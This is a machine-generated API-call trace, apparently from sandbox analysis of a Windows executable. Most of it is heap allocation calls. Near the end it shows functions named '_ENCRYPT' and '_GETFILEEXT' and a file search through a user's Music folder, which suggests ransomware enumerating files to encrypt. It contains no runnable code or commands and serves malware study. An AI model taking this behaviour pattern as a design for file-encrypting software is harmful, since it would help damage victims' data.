[0184.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0184.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0184.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0184.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0184.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0184.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0184.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0184.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0184.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0184.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0184.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0184.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0184.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0184.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0184.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0184.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0184.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0184.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0184.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0184.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0184.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0184.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0184.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0184.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0184.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0184.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0184.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0184.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0184.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0184.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0184.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0184.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0184.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0184.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0184.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0184.731] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0184.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0184.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0184.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0184.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0184.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0184.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0184.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0184.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0184.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0184.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0184.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0184.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0184.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0184.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0184.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0184.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0184.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0184.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0184.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.733] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0184.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0184.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0184.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0184.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0184.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0184.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0184.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0184.734] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0184.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0184.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0184.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0184.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0184.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0184.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0184.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0184.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0184.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0184.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0184.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0184.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0184.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0184.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0184.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0184.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0184.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0184.735] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0184.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0184.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0184.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0184.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0184.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0184.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0184.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0184.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0184.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0184.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0184.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0184.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0184.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0184.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.736] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0184.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0184.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0184.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba270 [0184.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba270, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0184.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0184.737] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0184.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0184.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0184.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0184.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0184.737] CloseHandle (hObject=0x138) returned 1 [0184.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0184.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0184.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0184.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0184.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0184.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0184.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0184.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0184.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0184.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0184.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0184.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0184.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0184.738] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0184.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0184.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0184.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0184.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0184.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0184.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0184.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0184.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0184.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0184.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0184.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0184.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0184.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0184.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.739] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0184.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0184.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0184.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0184.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0184.739] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0184.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0184.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0184.739] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0184.739] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0184.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0184.739] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0184.739] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0184.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0184.740] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.740] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.740] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.740] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1f88950, ftCreationTime.dwHighDateTime=0x1d5db3a, ftLastAccessTime.dwLowDateTime=0x15ec7d10, ftLastAccessTime.dwHighDateTime=0x1d5d8e8, ftLastWriteTime.dwLowDateTime=0x15ec7d10, ftLastWriteTime.dwHighDateTime=0x1d5d8e8, nFileSizeHigh=0x0, nFileSizeLow=0x10b3f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="snzbfu-3Qx.m4a", cAlternateFileName="SNZBFU~1.M4A")) returned 0x90add8 [0184.741] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0184.741] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.741] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1f88950, ftCreationTime.dwHighDateTime=0x1d5db3a, ftLastAccessTime.dwLowDateTime=0x15ec7d10, ftLastAccessTime.dwHighDateTime=0x1d5d8e8, ftLastWriteTime.dwLowDateTime=0x15ec7d10, ftLastWriteTime.dwHighDateTime=0x1d5d8e8, nFileSizeHigh=0x0, nFileSizeLow=0x10b3f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="snzbfu-3Qx.m4a", cAlternateFileName="SNZBFU~1.M4A")) returned 0x90add8 [0184.742] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0184.742] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS 